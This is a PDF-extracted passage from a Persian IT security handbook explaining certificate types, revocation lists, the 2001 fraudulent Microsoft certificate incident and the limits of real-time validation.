ﺍﺟﺎﺯﻩ ﻣﻲﺩﺍﺩ ﻛﻪ "ﻧﺎﻡ" ﻭ "ﻣﻘﺪﺍﺭ" ﺩﻟﺨﻮﺍﻩ ﺑﺘﻮﺍﻧﻨﺪ ﻣﺸﻤﻮﻝ ﮔﻮﺍﻫﻲ ﺍﺳﺘﺎﻧﺪﺍﺭﺩ ﺷﻮﻧﺪ .ﺍﻳﻦ ﺩﻭ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑـﺮﺍﻱ ﺍﻫـﺪﺍﻑ ﺑـﺴﻴﺎﺭﻱ ﺑﻜـﺎﺭ ﺭﻭﻧـﺪ ﻭ
ﺑﺎﻋﺚ ﺷﻮﻧﺪ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﮔﻮﺍﻫﻲﻫﺎ ﺑﺪﻭﻥ ﺗﻐﻴﻴﺮ ﭘﺮﻭﺗﻜﻞ ﻣﺮﺑﻮﻃﻪ ﮔﺴﺘﺮﺵ ﻳﺎﺑﺪ.
ﺍﻧﻮﻉ ﮔﻮﺍﻫﻲﻫﺎ
ﺩﺭ ﺍﻳﻨﺘﺮﻧﺖ ﺍﻣﺮﻭﺯ ﭼﻬﺎﺭ ﻧﻮﻉ ﻣﺠﻮﺯ ﺩﻳﺠﻴﺘﺎﻟﻲ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺳﺖ:
ﮔﻮﺍﻫﻲﻫﺎﻱ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ
ﺍﻳﻦ ﻣﺠﻮﺯﻫﺎ ﺷﺎﻣﻞ ﻛﻠﻴﺪ ﻋﻤﻮﻣﻲ ﻳﻚ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ،SSLﻧـﺎﻡ ﺳـﺎﺯﻣﺎﻧﻲ ﻛـﻪ ﺁﻥ ﺳـﺮﻭﻳﺲﺩﻫﻨـﺪﻩ ﺭﺍ ﺍﺟـﺮﺍ ﻣـﻲﻛﻨـﺪ ،ﻭ ﻧـﺎﻡ DNS
ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﺍﺳﺖ .ﻫﺮ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﺍﻃﻼﻋﺎﺕ ﺑﺎ ﻗﺎﺑﻠﻴﺖ ﺭﻣﺰﻧﮕﺎﺭﻱ ﺩﺭ ﺍﻳﻨﺘﺮﻧﺖ ﺑﺎﻳﺪ ﻳﻚ ﮔـﻮﺍﻫﻲ ﺳـﺮﻭﻳﺲﺩﻫﻨـﺪﻩ ﺑـﺮﺍﻱ ﭘﺮﻭﺗﻜـﻞ
ﺭﻣﺰﻧﮕﺎﺭﻱ SSLﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ ﺗﺎ ﺑﺘﻮﺍﻧﺪ ﺑﺪﺭﺳﺘﻲ ﻋﻤﻞ ﻛﻨﺪ .ﺍﮔﺮﭼﻪ ﻫﺪﻑ ﺍﺻﻠﻲ ﺻﺪﻭﺭ ﺍﻳﻦ ﮔﻮﺍﻫﻲﻫﺎ ﻛﻤﻚ ﺑـﻪ ﻣـﺸﺘﺮﻳﺎﻥ ﺩﺭ ﺗـﺸﺨﻴﺺ
ﻫﻮﻳﺖ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ﻭﺏ ﻭ ﺟﻠﻮﮔﻴﺮﻱ ﺍﺯ ﺣﻤﻼﺕ ﻓﺮﺩ-ﺩﺭ-ﻣﻴﺎﻥ-ﺭﺍﻩ ١٣٨ﺍﺳﺖ ،ﺍﻣﺎ ﺩﺭ ﻋﻤـﻞ ﻣﺠﻮﺯﻫـﺎﻱ ﺳـﺮﻭﻳﺲﺩﻫﻨـﺪﻩ ﺑـﻴﺶ ﺍﺯ
ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﺑﺮﺍﻱ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺑﻜﺎﺭ ﻣﻲﺭﻭﻧﺪ.
ﮔﻮﺍﻫﻲﻫﺎﻱ ﺷﺨﺼﻲ
ﺍﻳﻦ ﮔﻮﺍﻫﻲﻫﺎ ﺷﺎﻣﻞ ﻧﺎﻡ ﻳﻚ ﺷﺨﺺ ﻭ ﻛﻠﻴﺪ ﻋﻤﻮﻣﻲ ﻫﺴﺘﻨﺪ .ﺁﻧﻬﺎ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺍﻃﻼﻋﺎﺕ ﺩﻳﮕﺮﻱ ﻣﺎﻧﻨﺪ ﺁﺩﺭﺱ ﭘـﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ،ﺁﺩﺭﺱ
ﭘﺴﺘﻲ ،ﻭ ﺗﺎﺭﻳﺦ ﺗﻮﻟﺪ ﺷﺨﺺ ﺭﺍ ﻧﻴﺰ ﺷﺎﻣﻞ ﺷﻮﻧﺪ .ﺁﻧﻬﺎ ﺑﻮﺳﻴﻠﺔ ﺳﺎﺯﻣﺎﻧﻬﺎ ﺑﺮﺍﻱ ﺷﺎﻏﻠﻴﻦ ﻳﺎ ﻣﺸﺘﺮﻳﺎﻧﺸﺎﻥ ﺻﺎﺩﺭ ﻣﻲﺷﻮﻧﺪ .ﻣﺠﻮﺯﻫﺎﻱ ﺷﺨﺼﻲ
ﺫﺍﺗﹰﺎ ﻳﻚ ﺭﻭﺵ ﺍﻳﻤﻦﺗﺮ ﺑﺮﺍﻱ ﺁﻥ ﺍﺳﺖ ﻛﻪ ﺍﻓﺮﺍﺩ ﺭﻭﻱ ﺍﻳﻨﺘﺮﻧﺖ ﺧﻮﺩﺷﺎﻥ ﺭﺍ ﺑﺎ ﺭﻣﺰ ﻋﺒﻮﺭ ﻭ ﺷﻨﺎﺳﻪ ﻛﺎﺭﺑﺮﻱ ﻣﻌﺮﻓـﻲ ﻛﻨﻨـﺪ .ﺁﻧﻬـﺎ ﻫﻤﭽﻨـﻴﻦ
ﺑﺮﺍﻱ ﻛﺎﺭﺑﺮﺍﻥ ﭘﺮﻭﺗﻜﻞ ﺭﻣﺰﻧﮕﺎﺭﻱ ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ S/MIMEﻻﺯﻡ ﻫﺴﺘﻨﺪ.
ﺍﺑﻄﺎﻝ
ﻋﻼﻭﻩ ﺑﺮ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ،ﺩﺭﺻﻮﺭﺗﻴﻜﻪ ﻣﺮﮐﺰ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﺑﻔﻬﻤﺪ ﻛﻪ ﺩﭼﺎﺭ ﺍﺷﺘﺒﺎﻩ ﺷﺪﻩ ﺍﺳﺖ ﻳﺎ ﻛﻠﻴﺪ ﺧﺼﻮﺻﻲ ﻣﻮﺭﺩ ﺳﻮﺀ ﺍﺳـﺘﻔﺎﺩﻩ ﻗـﺮﺍﺭ
ﮔﺮﻓﺘﻪ ﺑﺎﻳﺪ ﺑﺘﻮﺍﻧﺪ ﮔﻮﺍﻫﻲ ﻣﺮﺑﻮﻃﻪ ﺭﺍ ﺑﺎﻃﻞ ﻛﻨﺪ .ﻫﻤﭽﻨﻴﻦ ﺯﻣﺎﻧﻴﻜﻪ ﻣﺪﺕ ﺍﻋﺘﺒﺎﺭ ﻫﺮﻳﻚ ﺍﺯ ﻣﺸﺘﺮﻛﻴﻦ ﺑﻪ ﭘﺎﻳـﺎﻥ ﻣـﻲﺭﺳـﺪ ﮔـﻮﺍﻫﻲ ﺍﻭ ﺑﺎﻳـﺪ
ﺍﺑﻄﺎﻝ ﺷﻮﺩ.
ﻼ ﺭﻭﺷﻦ ﺷﺪ ،ﺯﻣﺎﻧﻴﻜﻪ ﻣﺎﻳﻜﺮﻭﺳـﺎﻓﺖ ﺍﻋـﻼﻡ ﻛـﺮﺩ ﻛـﻪ VeriSignﺑـﺮﺍﻱ ﻧﻴﺎﺯ ﺑﻪ ﻳﻚ ﻣﻜﺎﻧﻴﺰﻡ ﻋﻤﻠﻲ ﺍﺑﻄﺎﻝ ﺩﺭ ﻣﺎﺭﺱ ﺳﺎﻝ ۲۰۰۱ﻛﺎﻣ ﹰ
ﻓﺮﺩﻱ ﻛﻪ ﺑﻪ ﺩﺭﻭﻍ ﺍﺩﻋﺎ ﻣﻲﻛﻨﺪ ﻳﻜﻲ ﺍﺯ ﻛﺎﺭﻣﻨﺪﺍﻥ ﻣﺎﻳﻜﺮﻭﺳﺎﻓﺖ ﺍﺳﺖ ﻭ ﻧﺎﻣﻲ ﻛﻪ ﺑﻌﻨﻮﺍﻥ ﺷﺮﻛﺖ ﻣﺤﻞ ﻛﺎﺭ ﺍﻭ ﺩﺭ ﻫﺮ ﺩﻭ ﻣﺠﻮﺯ ﺛﺒﺖ ﺷﺪﻩ
ﺷﺮﻛﺖ ﻣﺎﻳﻜﺮﻭﺳﺎﻓﺖ ﺍﺳﺖ ،ﺩﺭ ﻣﺎﻩ ﮊﺍﻧﻮﻳﻪ ﺩﻭ ﻣﺠﻮﺯ ﺻﺎﺩﺭ ﻛﺮﺩﻩ ﺍﺳﺖ .ﻣﺎﻳﻜﺮﻭﺳﺎﻓﺖ ﺍﺷﺎﺭﻩ ﻛﺮﺩ ﻛﻪ "ﺗﻮﺍﻧﺎﻳﻲ ﺍﻣﻀﺎﻱ ﻓﺎﻳﻠﻬﺎﻱ ﺍﺟﺮﺍﻳـﻲ ﺑـﺎ
138 Man-in-the-Middle
139 Minimal Disclosure Certificates
140 Stefan Brands
141 http://www.wired.com/news/technology/0,1282,34496,00.html
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ٣٢٤
ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻛﻠﻴﺪﻫﺎﻳﻲ ﻣﺪﻋﻲ ﻫﺴﺘﻨﺪ ﺑﻪ ﻣﺎﻳﻜﺮﻭﺳﺎﻓﺖ ﺗﻌﻠﻖ ﺩﺍﺭﻧﺪ ﻣﻲﺗﻮﺍﻧﺪ ﺑﺮﺍﻱ ﻣﻬﺎﺟﻤﻴﻨﻲ ﻛﻪ ﻣﻲﺧﻮﺍﻫﻨﺪ ﻛـﺎﺭﺑﺮﺍﻥ ﺭﺍ ﻭﺍﺩﺍﺭ ﺑـﻪ ﭘـﺬﻳﺮﺵ
١٤٢
ﺍﺟﺮﺍﻱ ﺁﻥ ﻓﺎﻳﻠﻬﺎ ﻛﻨﻨﺪ ﻣﻨﺎﻓﻌﻲ ﺯﻳﺎﺩﻱ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ".
ﺍﮔﺮ ﻣﺮﮐﺰ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﺧﻴﻠﻲ ﻣﺸﻬﻮﺭ ﺑﺎﺷﺪ ﺍﺣﺘﻤﺎﻝ ﺩﺍﺭﺩ ﻛﻪ CRLﻫﺎ ﺧﻴﻠﻲ ﺑﺰﺭﮒ ﺑﺎﺷـﻨﺪ Download .ﻛـﺮﺩﻥ ﻳـﻚ ﻓﻬﺮﺳـﺖ •
ﻼ ۹۰۰ﻛﻴﻠﻮﺑﺎﻳﺖ ﺍﺯ ﻃﺮﻳﻖ ﺍﺗﺼﺎﻝ ﺗﻠﻔﻨﻲ ﺑﻪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ SSLﻣﺮﮐـﺰ ﺻـﺪﻭﺭ ﮔـﻮﺍﻫﻲ VeriSignﻣﻤﮑـﻦ CRLﺑﺎ ﺣﺠﻢ ﻣﺜ ﹰ
ﺍﺳﺖ ﺑﻴﺶ ﺍﺯ ۲۰ﺩﻗﻴﻘﻪ ﻭﻗﺖ ﺑﮕﻴﺮﺩ؛
ﻣﻴﺎﻥ ﺯﻣﺎﻧﻲ ﻛﻪ ﮔﻮﺍﻫﻲ ﺍﺑﻄﺎﻝ ﻣﻲﺷﻮﺩ ﻭ ﺯﻣﺎﻧﻲ ﻛﻪ CRLﺟﺪﻳﺪ ﺗﻮﺯﻳﻊ ﻣﻲﺷﻮﺩ ﻳﻚ ﺑـﺎﺯﺓ ﺯﻣـﺎﻧﻲ ﻭﺟـﻮﺩ ﺩﺍﺭﺩ ﻛـﻪ ﺩﺭ ﺁﻥ ﮔـﻮﺍﻫﻲ •
ﻣﻌﺘﺒﺮ ﺑﻨﻈﺮ ﻣﻲﺁﻳﺪ ،ﺩﺭﺣﺎﻟﻴﻜﻪ ﺍﻳﻨﮕﻮﻧﻪ ﻧﻴﺴﺖ؛ ﻭ
ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺑﺮﻧﺎﻣﻪﻫﺎCRL ،ﻫﺎ ﻭ CDPﻫﺎ ﺭﺍ ﺑﺼﻮﺭﺕ ﺻﺤﻴﺢ ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﻧﻤﻲﻛﻨﻨﺪ. •
ﺩﺭ ﻣﻮﺭﺩ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲﻫﺎﻱ ﺟﻌﻠﻲ ﻣﺎﻳﻜﺮﻭﺳﺎﻓﺖ ﻛﻪ ﭘﻴﺸﺘﺮ ﺍﺷـﺎﺭﻩ ﺷـﺪ ،ﮔـﻮﺍﻫﻲﻫـﺎﻱ ﻧﺎﺩﺭﺳـﺖ ﺑﺎﻃـﻞ ﺷـﺪﻧﺪ ﻭ ﺩﺭ CRLﻣﺮﺑـﻮﻁ ﺑـﻪ
VeriSignﺁﻣﺪﻧﺪ ،ﺍﻣﺎ ﻣﺘﺄﺳﻔﺎﻧﻪ ﮔﻮﺍﻫﻲﻫﺎﻳﻲ ﻛﻪ VeriSignﺻﺎﺩﺭ ﻛﺮﺩﻩ ﺑﻮﺩ ﺣﺎﻭﻱ CDPﻫـﺎﻱ ﻣﻌﺘﺒـﺮ ﻧﺒـﻮﺩ) .ﻃﺒـﻖ ﺍﻋـﻼﻡ ،VeriSign
ﺑﺪﻟﻴﻞ ﻳﻚ ﺍﺷﻜﺎﻝ ﺩﺭ ﭘﻴﺎﺩﻩﺳﺎﺯﻱ Authenticodeﻛﻪ ﻫﻤﺮﺍﻩ Internet Explorer 3.02ﺗﻮﺯﻳﻊﺷﺪﻩCDP ،ﻫﺎ ﺩﺭ ﮔﻮﺍﻫﻲﻫﺎﻱ Authenticodeﻭﺟﻮﺩ ﻧﺪﺍﺭﻧﺪ(.
ﺑﺪﻭﻥ ﻭﺟﻮﺩ ،CDPﺑﺮﻧﺎﻣﻪﺍﻱ ﻛﻪ ﺗﻼﺵ ﻣﻲﻛﺮﺩ ﺍﻋﺘﺒﺎﺭ ﮔﻮﺍﻫﻲ ﺟﻌﻠﻲ ﺻﺎﺩﺭ ﺷﺪﻩ ﺭﺍ ﺗﺼﺪﻳﻖ ﻛﻨﺪ ،ﻧﻤﻲﺩﺍﻧﺴﺖ ﻛـﻪ CRLﻣﺮﺑﻮﻃـﻪ ﻛـﻪ
١٤٥
ﮔﻮﺍﻫﻲﻫﺎﻱ ﺑﺎﻃﻠﻪ ﺩﺭ ﺁﻥ ﻓﻬﺮﺳﺖ ﺷﺪﻩ ﺑﻮﺩﻧﺪ ﺭﺍ ﺍﺯ ﻛﺠﺎ ﺑﺎﻳﺪ ﺩﺭﻳﺎﻓﺖ ﻣﻲﻛﺮﺩ.
ﻳﻚ ﺭﺍﻩ ﺟﺎﻳﮕﺰﻳﻦ ﺑﺮﺍﻱ CRLﻫﺎ ،ﺍﺭﺯﻳﺎﺑﻲ ﺍﻋﺘﺒﺎﺭ ﮔﻮﺍﻫﻲﻫﺎ ﺑﺼﻮﺭﺕ ﺑﻼﺩﺭﻧﮓ ﺍﺳﺖ .ﻫﺮ ﺯﻣﺎﻥ ﻛﻪ ﻻﺯﻡ ﺑﺎﺷﺪ ﻳﻚ ﮔﻮﺍﻫﻲ ﺍﺭﺯﻳﺎﺑﻲ ﺍﻋﺘﺒـﺎﺭ
ﺷﻮﺩ ﺑﺼﻮﺭﺕ onlineﺑﺎ ﻣﺮﻛﺰ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﻣﺸﻮﺭﺕ ﻣﻲﻛﻨﺪ .ﺳﻴﺴﺘﻤﻬﺎﻱ ﺍﺭﺯﻳﺎﺑﻲ ﺑﻼﺩﺭﻧﮓ ﻣﺸﻜﻞ CRLﺭﺍ ﺑﺨﻮﺑﻲ ﺣـﻞ ﻣـﻲﻛﻨﻨـﺪ،
ﻫﺮﭼﻨﺪ ﮐﻪ ﺑﻪ ﻳﻚ ﺷﺒﻜﺔ ﻗﺎﺑﻞ ﺍﻋﺘﻤﺎﺩ ﻭ ﻣﻌﺘﺒﺮ ﻧﻴﺎﺯ ﺩﺍﺭﻧﺪ.
142 http://www.microsoft.com/technet/security/bulletin/MS01-017.asp
143 Certificate Revocation Lists
144 CRL Distribution Point
۱۴۵ﺩﺭ ﭘﺎﻳﺎﻥ ﻣﺎﻳﻜﺮﻭﺳﺎﻓﺖ ﻣﺠﺒﻮﺭ ﺷﺪ ﻳﻚ ﻭﺻﻠﺔ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ﺻﺎﺩﺭ ﻛﻨﺪ ﺗﺎ ﻣﺸﻜﻞ ﺣﻞ ﺷﻮﺩ .ﺍﺻـﻼﺡ ﻣـﻮﺭﺩ ﺍﺷـﺎﺭﻩ ﺣـﺎﻭﻱ ﻳـﻚ CDPﺍﺿـﺎﻓﻪ ﺑـﻮﺩ ﻛـﻪ Internet
Explorerﺭﺍ ﺑﻪ ﺩﺭﻳﺎﻓﺖ ﺍﻃﻼﻋﺎﺕ ﺍﺯ ﻳﻚ CRLﻣﺤﻠﻲ ﻭﺍﺩﺍﺭ ﻣﻲﻛﺮﺩ ﺗﺎ ﺍﻋﺘﺒﺎﺭ ﮔﻮﺍﻫﻲﻫﺎ ﺭﺍ ﺍﺭﺯﻳﺎﺑﻲ ﻛﻨﺪ ،ﻭ ﻧﻴﺰ ﻳﻚ ﻓﻬﺮﺳﺖ CRLﻛﻪ ﺩﻭ ﮔﻮﺍﻫﻲ ﺍﺷﺘﺒﺎﻩ ﺻﺎﺩﺭ ﺷﺪﻩ
ﺗﻮﺳﻂ VeriSignﺩﺭ ﺁﻥ ﺑﻮﺩ.
٣٢٥ ﺑﺨﺶ ﭘﻨﺠﻢ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ
ﻲ ﺍﻋﺘﺒﺎ ﹺﺭ ﮔﻮﺍﻫﻲ ،ﻣﺸﻜﻞ "ﻣﻘﻴﺎﺱ" ﺍﺳﺖ .ﺍﺯ ﺁﻧﺠﺎ ﻛﻪ ﮔﻮﺍﻫﻲﻫﺎ ﻛﺎﺭﺑﺮﺍﻥ ﺑﻴﺸﺘﺮ ﻭ ﺑﻴﺸﺘﺮﻱ ﭘﻴﺪﺍ ﻣﺸﻜﻞ ﺍﻭﻝ ﺩﺭ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺑﻼﺩﺭﻧﮓ ﺍﺭﺯﻳﺎﺑ ﹺ
ﻣﻲﻛﻨﻨﺪ ،ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ﺍﺭﺯﻳﺎﺑﻲ ﺍﻋﺘﺒﺎﺭ ﻧﻴﺎﺯ ﺩﺍﺭﻧﺪ ﺳﺮﻳﻌﺘﺮ ﻭ ﺳﺮﻳﻌﺘﺮ ﺷﻮﻧﺪ ﺗﺎ ﺑﺘﻮﺍﻧﻨﺪ ﺑﻪ ﺟﺎﻣﻌﺔ ﺩﺭﺣﺎﻝ ﺭﺷﺪ ﻛـﺎﺭﺑﺮﺍﻥ ،ﺍﺭﺍﺋـﻪ ﺧـﺪﻣﺎﺕ
ﺩﻫﻨﺪ .ﻋﻼﻭﻩ ﺑﺮ ﺍﻳﻦ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺑﻼﺩﺭﻧﮓ ﻧﺴﺒﺖ ﺑﻪ ﺣﻤﻼﺕ ﺧﺮﺍﺑﻲ ﺳﺮﻭﻳﺲ ﺁﺳﻴﺐﭘﺬﻳﺮ ﻫﺴﺘﻨﺪ .ﺍﮔﺮ ﻳﻚ ﺷﺮﻛﺖ ﺗﺠﺎﺭﻱ ﺍﻣﻜﺎﻥ ﺍﺗﺼﺎﻝ
ﺑﻪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﺍﺑﻄﺎﻝ ﺭﺍ ﻧﺪﺍﺷﺘﻪ ﺑﺎﺷﺪ ،ﺑﺎ ﻳﻚ ﮔﻮﺍﻫﻲ ﺑﺎﻳﺪ ﭼﮕﻮﻧﻪ ﺑﺮﺧﻮﺭﺩ ﻛﻨﺪ؟ ﺑﻪ ﺁﻥ ﺍﻋﺘﻤﺎﺩ ﻛﻨﺪ ﻳﺎ ﺍﻋﺘﺒﺎﺭﻱ ﺑـﺮﺍﻱ ﺁﻥ ﻗﺎﺋـﻞ ﻧـﺸﻮﺩ؟
ﺍﮔﺮ ﭘﻴﺶﻓﺮﺽ ﺍﻋﺘﻤﺎﺩ ﻛﺮﺩﻥ ﺑﺎﺷﺪ ،ﻣﻬﺎﺟﻢ ﻣﻲﺗﻮﺍﻧﺪ ﺑﺎ ﻓﺮﺳﺘﺎﺩﻥ ﺩﺭﺧﻮﺍﺳﺘﻬﺎﻱ ﻣﺠﺎﺯﻱ ﺑﺴﻴﺎﺭ ﺯﻳﺎﺩ ﺑﻪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﺍﺑﻄﺎﻝ ﻣﻮﺟﺐ ﺍﺯ ﻛﺎﺭ
ﺍﻓﺘﺎﺩﻥ ﺁﻥ ﺩﺭ ﺯﻣﺎﻥ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻳﻚ ﮔﻮﺍﻫﻲ ﻧﺎﻣﻌﺘﺒﺮ ﺷﻮﺩ .ﺍﮔﺮ ﭘﻴﺶﻓﺮﺽ ﺑﻲﺍﻋﺘﻤﺎﺩﻱ ﺑﺎﺷﺪ ،ﺍﻳﻦ ﺍﻣﻜﺎﻥ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ ﻣﻬﺎﺟﻢ ﺑﺎ ﺍﺳـﺘﻔﺎﺩﻩ
ﺍﺯ ﺣﻤﻼﺕ ﺗﺨﺮﻳﺐ ﺳﺮﻭﻳﺲ ﺑﺎﻋﺚ ﺷﻮﺩ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﺍﺑﻄﺎﻝ ﺩﺭ ﺩﺳﺘﺮﺱ ﻧﺒﺎﺷﺪ ﻭ ﺩﺭﻧﺘﻴﺠﻪ ﻛﻠﻴﺔ ﺗﺮﺍﻛﻨﺸﻬﺎ ﺭﺩ ﺷﻮﻧﺪ ،ﻭ ﺍﻋﺘﺒـﺎﺭ ﺷـﺮﻛﺖ
ﺑﺴﺮﻋﺖ ﺧﺪﺷﻪﺩﺍﺭ ﮔﺮﺩﺩ.
ﺑﺮﺍﻱ ﻳﻚ ﻣﺮﮐﺰ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﺍﻫﻤﻴﺖ ﺯﻳﺎﺩﻱ ﺩﺍﺭﺩ ﻛﻪ ﻫﻤﺔ URLﻫﺎﻳﻲ ﻛﻪ ﺩﺭ ﻫﺮﻳﻚ ﺍﺯ ﮔﻮﺍﻫﻲﻫﺎﻱ ﮐﻪ ﺻﺎﺩﺭ ﮐﺮﺩﻩ ﺁﻣﺪﻩ ﺭﺍ ﭘـﺸﺘﻴﺒﺎﻧﻲ
ﻛﻨﺪ .ﺍﮔﺮ ﻳﻚ ﻣﺮﮐﺰ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ CPS ،ﻣﺮﺑﻮﻁ ﺑﻪ ﺧﻮﺩ ﺭﺍ ﻋﻮﺽ ﻛﻨﺪ ،ﺁﻧﮕﺎﻩ ﻫﺮ CPSﺑﺎﻳﺪ ﺍﺯ ﻳـﻚ URLﻳﻜﺘـﺎ ﺑﺪﺳـﺖ ﺁﻳـﺪ .ﺍﻳـﻦ
ﻲ ﻣﻮﺭﺩ ﺗﺄﻳﻴﺪ ﻛﻪ ﺑﻪ ﺁﻥ CPSﺑﺎﺯﻣﻲﮔﺮﺩﺩ ﻗﺎﺑـﻞ ﺩﺳﺘﺮﺳـﻲ ﺑﺎﺷـﻨﺪ ،ﭼـﻮﻥ ﻣﻌﻨـﺎﻱ ﺣﻘـﻮﻗﻲ ﻭ ﻟﻴﻨﻜﻬﺎ ﺑﺎﻳﺪ ﺩﺭ ﺗﻤﺎﻡ ﻣﺪﺕ ﺍﻋﺘﺒﺎﺭ ﻫﺮ ﮔﻮﺍﻫ ﹺ
ﻗﺎﻧﻮﻧﻲ ﮔﻮﺍﻫﻲ ﺑﺪﻭﻥ ﺧﻮﺍﻧﺪﻥ CPSﻗﺎﺑﻞ ﺗﺸﺨﻴﺺ ﻧﺨﻮﺍﻫﺪ ﺑﻮﺩ .ﻋﻼﻭﻩ ﺑﺮ ﺁﻥ ،ﭼﻮﻥ ﺍﻳﻦ ﺍﻣﻜﺎﻥ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ ﻣﻌﻨﺎﻱ ﻳﻚ ﺍﻣـﻀﺎ ﭼﻨـﺪ
ﺳﺎﻝ ﺑﻌﺪ ﺍﺯ ﭘﺪﻳﺪ ﺁﻣﺪﻥ ﺁﻥ ﻣﻮﺭﺩ ﺳﺆﺍﻝ ﻗﺮﺍﺭ ﺑﮕﻴﺮﺩ ،ﻗﺎﻋﺪﺗﹰﺎ URLﻫﺎ ﺑﺎﻳﺪ ﺑﺮﺍﻱ ﻳﻚ ﺑﺎﺯﺓ ﺣﺪﺍﻗﻞ ۲۰ﺳﺎﻟﻪ ﻓﻌﺎﻝ ﺑﻤﺎﻧﻨﺪ.
ﻣﺘﺄﺳﻔﺎﻧﻪ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﮔﻮﺍﻫﻲﻫﺎﻱ ﻣﺮﺍﮐﺰ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﺍﺯ CPSﻫﺎﻳﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻛﺮﺩﻩﺍﻧﺪ ﻛﻪ ﺩﻳﮕﺮ ﻗﺎﺑﻞ ﺩﺳﺘﺮﺳﻲ ﻧﻤﻲﺑﺎﺷﻨﺪ .ﻣﺜ ﹰ
ﻼ ﮔـﻮﺍﻫﻲ
ﺧﻮﺩ ﺍﻣﻀﺎﻱ Autoridad Certificadora del Colegio Nacional de Correduria Publica Mexicana, A.C.ﻛـﻪ
ﺑﻪ ﻫﻤﺮﺍﻩ ﺑﺮﻧﺎﻣﺔ Internet Explorer 5.0ﺗﻮﺯﻳﻊ ﺷﺪﻩ ،ﺍﺯ ﮊﻭﺋﻦ ۱۹۹۹ﺗﺎ ﮊﻭﺋﻦ ۲۰۰۹ﻣﻌﺘﺒﺮ ﺍﺳﺖ .ﺍﻳﻦ ﮔـﻮﺍﻫﻲ ﺍﺩﻋـﺎ ﻣـﻲﻛﻨـﺪ ﻛـﻪ
CPSﻣﺮﺑﻮﻁ ﺑﻪ ﺁﻥ ﺩﺭ ﺁﺩﺭﺱ http://www.correduriapublica.org.mx/RCD/dpcﻗﺎﺑﻞ ﺩﺳﺘﺮﺳﻲ ﺍﺳﺖ ،ﺩﺭﺣﺎﻟﻴﻜـﻪ ﺍﻳـﻦ
URLﺣﺪﺍﻗﻞ ﺩﺭ ﺁﻭﺭﻳﻞ ۲۰۰۱ﻗﺎﺑﻞ ﺩﺳﺘﺮﺳﻲ ﻧﺒﻮﺩ.
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ٣٢٦
ﻧﻴﺎﺯ ﺑﻪ ﻳﻚ ﺯﻳﺮﺳﺎﺧﺖ ﮐﻠﻴﺪ ﻋﻤﻮﻣﻲ ﮔﺴﺘﺮﺩﻩ ﺍﺟﺘﻨﺎﺏ ﻧﺎﭘﺬﻳﺮ ﺍﺳﺖ .ﺗﻌﺪﺍﺩ ﺣﻮﺍﺩﺙ ﻛﻼﻫﺒﺮﺩﺍﺭﻱ ﺩﺭ ﺍﻳﻨﺘﺮﻧﺖ ﺭﻭ ﺑﻪ ﺍﻓﺰﺍﻳﺶ ﺍﺳﺖ ﻭ ﻧﻴـﺎﺯ ﺑـﻪ
ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺍﻣﻀﺎﻫﺎﻱ ﺩﻳﺠﻴﺘﺎﻟﻲ ﺑﺮﺍﻱ ﺗﺠﺎﺭﺕ ﺯﻳﺎﺩ ﻣﻲﺷﻮﺩ .ﺑﺎ ﺍﻳﻦ ﻫﻤﻪ PKIﮔﺴﺘﺮﺩﺓ ﺍﻣﺮﻭﺯ ﺑﻨﻈﺮ ﺩﻭﺭﺗﺮ ﺍﺯ ﺍﻭﺍﺳﻂ ﺩﻫﺔ ۱۹۹۰ﻣـﻲﺭﺳـﺪ.
ﻼ
